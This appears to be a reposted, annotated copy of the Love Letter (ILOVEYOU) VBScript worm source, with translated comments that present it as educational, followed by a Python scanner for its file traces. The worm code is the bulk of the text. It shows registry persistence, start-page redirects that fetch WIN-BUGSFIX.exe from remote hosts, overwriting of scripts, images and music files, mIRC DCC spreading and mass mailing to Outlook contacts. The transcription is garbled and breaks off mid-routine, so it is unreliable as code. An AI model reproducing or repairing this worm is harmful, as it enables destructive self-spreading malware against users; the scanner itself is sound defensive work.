'Description: This article is published so that readers can understand the Love Letter virus and guard against it effectively.
'If the moderator believes this article may be used by bad people, please delete it.
'The Chinese comments in the program are additions; they explain the virus's characteristics and give a method of preventing the virus.
'I personally think that Love Letter is not very good, but the many technologies it uses are indeed admirable. The virus author may not have received professional programming training, but judging from the selection of program resources, some effort did go into it.
'This virus source code can also be used to answer a lot of questions from VB enthusiasts.
REM BAROK -LOVELETTER (VBE) Rem by: spyder / ispyder@mail.com / @grammersoft group / manila, philip pines
'Note: Program author's signature (possib)
on Error ResMe Next Dim Fso, Dirsystem, Dirwin, Dirtemp, EQ, CTR, File, VBScopy, Dow EQ = "" CTR = 0 set fso = createObject ("scripting.filesystemObject")
'Note: FileSystemObject is the most dangerous part of the M$ VBVM system; its functions are very powerful.
'The virus's use of FSO shows that modifying the registry can easily prevent a Love Letter outbreak.
Set file = fso.opentextFile (wscript.scriptfullname, 1) vbscopy = file.readall main ()
'Note - The initialization of the program is completed.
sub main () On Error Resume Next dim wscr, rr set wscr = CreateObject ( "WScript.Shell") rr = wscr.RegRead ( "HKEY_CURRENT_USER / Software / Microsoft / Windows Scriptin g Host / Settings / Timeout") if (rr> = 1) THEN WSCR.REGWRITE "HKEY_CURRENT_USER / SOFTWARE / Microsoft / Windows Scripting Host / Settings / Timeout", 0, "REG_DWORD"
'Note - Prevents the termination caused by an operation timeout.
'It should be said that the programmer who wrote the virus took the possible problems into account; this is worth doing in all programming.
Endiffialfolder (0) Set Dirsystem = fso.getspecialfolder (1) Set dirtemp = fso.getspecialFolder (2)
'Gets the names of the key system folders. This can also be used when programming in VB.
Set c = fso.getfile (wscript.scriptfullname) C.copy (Dirsystem & "/ mskernel32.vbs") c.copy (Dirwin & "/ Win32dll.vbs") C. Copy (Dirsystem & "/ Love-letter-for-you. TXT.VBS ")
'Copies itself to the key directories.
'The file names are not well chosen; they are easy to find.
REGRUNS () HTML () spreadtoemail () ListAdriv () End sub subs regruns ()
'Modifies the registry so that the virus program is loaded automatically.
'Prevention: check this branch of the registry often.
'Known methods also put an HTA in the Startup folder. The method used by the virus program is more advanced,
'because it does not fail because of language problems.
On Error Resume Next Dim num, downread regcreate "HKEY_LOCAL_MACHINE / Software / Microsoft / Windows / CurrentVersio n / Run / MSKernel32", dirsystem & "/ MSKernel32.vbs" regcreate "HKEY_LOCAL_MACHINE / Software / Microsoft / Windows / CurrentVersio n / RunServices / Win32DLL" , dirwin & "/ Win32DLL.vbs" downread = "" downread = regget ( "HKEY_CURRENT_USER / Software / Microsoft / Internet Explore r / Download Directory") if (downread = "") then downread = "c: /" end if if ( FileExist (Dirsystem & "/ Winfat32.exe") = 1) Ten Randomize Num = INT ((4 * RND) 1) if Num = 1 Then Regreate "HKCU / Software / Microsoft / Internet Explorer / Main / Start Page", " http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj w6587345gvsdf7679njbvYT / WIN-BUGSFIX.exe "elseif num = 2 then regcreate" HKCU / Software / Microsoft / Internet Explorer / Main / Start Page "," http: // www .skyinet.net / ~ angelcat / skladjflfdjghKJnwetryDGFikjUIyqwerWe 546786324hjk4jnHHGbvbmKLJKjhkqj4w / WIN-BUGSFIX.exe "elseif num = 3 then regcreate" HKCU / Software / Microsoft / Internet Explorer / Main / Sta rt Page "," http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm POhfgER67b3Vbvg / WIN-BUGSFIX.exe "elseif num = 4 then regcreate" HKCU / Software / Microsoft / Internet Explorer / Main / Start Page "," http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg / WIN-B UGSFIX.exe "end if end if if (fileexist (downread &" / WIN-BUGSFIX.exe ") = 0) then regcreate" HKEY_LOCAL_MACHINE / Software / Microsoft / Windows / CurrentVersio N / Run / Win-Bugsfix ", DownRead &"
/WIN-BUGSFIX.exe "regcreate" HKEY_CURRENT_USER / Software / Microsoft / Internet Explorer / Main / Start Page "," about: blank "end if end sub sub listadriv
'Iterates through all the drives.
On Error Resume Next Dim d, dc, s. SET DC = FSO.DRIVES for Each D in DC if D.DriveType = 2 or D.DriveType = 3 THEN FOLDERLIST (D.Path & "/") End If Next ListAdriv = S End Sub InfectFiles (Folderspec)
'Performs the file infection operation.
On Error ResMe Next Dimf, F1, FC, EXT, AP, MIRCFNAME, S, BNAME, MP3 set f = fso.getfolder (folderspec) set fc = f.files for Each F1 in fc ext = fso.getextensionName (F1. PATH) EXT = LCASE (EXT) S = LCase (f1.name) IF (ext = "VBS") or (ext = "vbe") THEN SET AP = FSO.OpenTextFile (f1.path, 2, true) AP. Write vbscopy ap.close elseif (ext = "js") or (ext = "css") or (ext = "wsh") or (ext = "sct") or (ext = " HTA ") THENTETFILE (f1.path, 2, true) ap.write vbscopy ap.close bName = fso.getBaseName (f1.path) set copick = fso.getfile (f1.path) Cop.copy (Folderspec & "/" & BNAME & ". VBS") fso.deletefile (f1.path) elseif (ext = "jpg") or (ext = "jpeg") THEN SET AP = fso.opentextfile (f1.path, 2, true ) ap.write vbscopy ap.close set cop = fso.getfile (f1.path) Cop.copy (f1.path & ". vbs") fso.deletefile (f1.path) elseif (ext = "mp3") or (ext) OR (EXT = "MP2") THEN SET MP3 = fso.createteTextFile (f1.path & ". vbs") mp3.write vbscopy mp3.close set att = fso.getfile (f1.path) att.attributes = att.attributes 2 end if IF (EQ <> folderspec) THEN IF (S = "mirc32.exe") or (s = "mlin K32.exe ") or (s =" mirc.ini ") or (s =" scri pt.ini ") or (s =" mirc.hlp ") THEN SET Scriptini = fso.createteTextFile (Folderspec &" / Script.ini ") scriptini.WriteLine" [script] "scriptini.WriteLine"; mIRC Script "scriptini.WriteLine"; Please dont edit this script ... mIRC will corru pt, if mIRC will "scriptini.WriteLine" corrupt ... WINDOWS will Affect And Will NOT Run Correctly. Thanks
'The virus author's English was probably not learned well ... yet it is used like this to scare people.
'A reminder here to pay attention: do not care about those scary texts, and you will find that the vulnerability is not small.
Scriptini.writeline ";" scriptini.writeline "; khaled mardam-bey" scriptini.writeline "; http://www.mirc.com" scriptini.writeline ";" scriptini.writeline "N0 = On 1: Join: #: {"scriptini.writeline" n1 = / if ($ nick == $ me) {halt} "scriptini.writeline" N2 = /.dcc send $ Nick "& Dirsystem &" / Love-letter-fo r-you.htm "scriptini .Writeline "N3 =}"
'Note: the result of this is that mIRC can also spread the virus.
scriptini.close eq = folderspec end if end if next end sub sub folderlist (folderspec)
'Traverses the folders.
On Error Resume Next dim f, f1, sf set f = fso.GetFolder (folderspec) set sf = f.SubFolders for each f1 In sf infectfiles (f1.path) folderlist (f1.path) Next End sub subs regreate (regKey, regvalue)
'Modifies the registry (creates a key).
'This routine seems to be Microsoft's demonstration program.
Set regedit = createObject ("wscript.shell") regedit.regWrite Regkey, RegValue End Sub Function Regget (Value)
'This routine seems to be Microsoft's demonstration program. (WSH demonstration, in the Windows folder)
Set regedit = createObject ("wscript.shell") Regget = regedit.regread (value) End function function fileexist (filespec)
'Determines whether a file exists.
'Purely from a technical perspective, this routine is not well written.
'There is no need to write so much; the same function can be implemented more briefly.
on Error Resume next Dim Msg if (fso.fileexists (filespec)) THEN MSG = 0 else msg = 1 end if fileexist = msg end function function folderexist (folderspec)
'Determines whether a folder exists.
'It is as bad as the previous routine.
On Error Resume Next dim msg if (fso.GetFolderExists (folderspec)) then msg = 0 else msg = 1 end if fileexist = msg end function sub spreadtoemail ()
'Spreads by email.
On Error Resume Next dim x, a, ctrlists, ctrentries, malead, b, regedit, regv, regad set regedit = CreateObject ( "WScript.Shell") set out = WScript.CreateObject ( "Outlook.Application")
'Limitation of the virus: it only supports Outlook; Outlook Express is not supported.
set mapi = out.GetNameSpace ( "MAPI") for ctrlists = 1 to mapi.AddressLists.Count set a = mapi.AddressLists (ctrlists) x = 1 regv = regedit.RegRead ( "HKEY_CURRENT_USER / Software / Microsoft / WAB /" & a ) IF (regv = ") THEN REGV = 1 end if if (int (a.addressentries.count)> int (regv)) THEN for ctrentries = 1 to a.addressentries.count MaleAd = a.addressentries (x) Regad = "" Regad = regedit.regread ("HKEY_CURRENT_USER / SOFTWARE / Microsoft / WAB /" & MALE AD) IF (regad = ") THEN SET MALE = out.createItem (0) Male.Recipients.Add (MaleAd) Male.Subject = "IloveYou"
'The reason for the name of the virus.
'A message like this is definitely a virus. A person of normal mind would probably not be so straightforward.
male.Body = vbcrlf & "kindly check the attached LOVELETTER coming from m e." male.Attachments.Add (dirsystem & "/ LOVELETTER-FOR-YOU.TXT.vbs") male.Send regedit.RegWrite "HKEY_CURRENT_USER / Software / Microsoft / WAB / "& malead, 1," REG_DWORD "end if x = x 1 next regedit.RegWrite" HKEY_CURRENT_USER / Software / Microsoft / WAB / "& a, a.Addre ssEntries.Count else regedit.RegWrite" HKEY_CURRENT_USER / Software / Microsoft / WAB / "& A, A.Addre Ssentries.count End End Set Out = Nothing SET MAPI = Nothing End Sub Sub HTML
'From the technical point of view, this routine is very well done, because it makes full use of Outlook's resources.
'It is worth noting for anyone who writes programs.
'The _ symbol in the middle of the routine is the line-continuation character, so the comments are written here.
'There are many invalid statements in the routine, and they take up a lot of space.
On Error ResMe next Dim line, N, DTA1, DTA2, DT1, DT2, DT3, DT4, L1, DT5, DT6 DTA1 = "
to enable to r EAD this html file
- please press # - # YES # - # Button to enable Active x -? p> & vbcrlf & _ " -? center>
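The file-system traces described in the listing above (the dropped copies, the `.vbs` files created beside or in place of pictures and music, the overwritten scripts and the mIRC `script.ini`) can be checked for with a short scanner. This is an added example, not part of the original post: the `barok`/`loveletter` header test and the `dcc send` test are heuristics assumed from the lines shown above, and the sample tree is constructed.

```python
import tempfile
from pathlib import Path

# Names taken from the listing above; compared case-insensitively.
DROPPED = {"mskernel32.vbs", "win32dll.vbs", "love-letter-for-you.txt.vbs",
           "love-letter-for-you.htm", "win-bugsfix.exe"}
MASKED = {".jpg", ".jpeg", ".mp3", ".mp2"}  # replaced by "<file><ext>.vbs"

def _head(path, size=4096):
    try:
        with path.open("rb") as fh:
            return fh.read(size).decode("latin-1").lower()
    except OSError:
        return ""  # unreadable or missing file: nothing to match

def classify(path):
    """Return why a file matches an artifact of the listing, or None."""
    name, suffixes = path.name.lower(), [s.lower() for s in path.suffixes]
    if name in DROPPED:
        return "dropped copy"
    if len(suffixes) >= 2 and suffixes[-1] == ".vbs" and suffixes[-2] in MASKED:
        return "script posing as media"
    head = _head(path) if path.suffix.lower() in (".vbs", ".vbe", ".ini") else ""
    if "barok" in head and "loveletter" in head:   # assumed header marker
        return "overwritten script"
    if name == "script.ini" and "dcc send" in head:  # heuristic, may over-match
        return "mIRC auto-send script"
    return None

def scan(root):
    found = ((p, classify(p)) for p in Path(root).rglob("*") if p.is_file())
    return {p.relative_to(root).as_posix(): why for p, why in found if why}

def demo():
    """Scan a constructed, harmless sample tree (file names are made up)."""
    samples = {
        "System/MSKernel32.vbs": "placeholder",
        "Music/song.mp3.vbs": "placeholder",
        "Scripts/login.vbs": "rem barok -loveletter (vbe)\n",
        "Scripts/backup.vbs": 'WScript.Echo "nightly backup"\n',
        "mirc/script.ini": "[script]\nn2= /.dcc send $nick page.htm\n",
        "Docs/notes.txt": "meeting notes",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, text in samples.items():
            target = Path(root, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(text)
        return scan(root)
```

Scripts that were overwritten in place keep their original names, so only the content check catches them; a name-only sweep would miss `Scripts/login.vbs` in the sample tree.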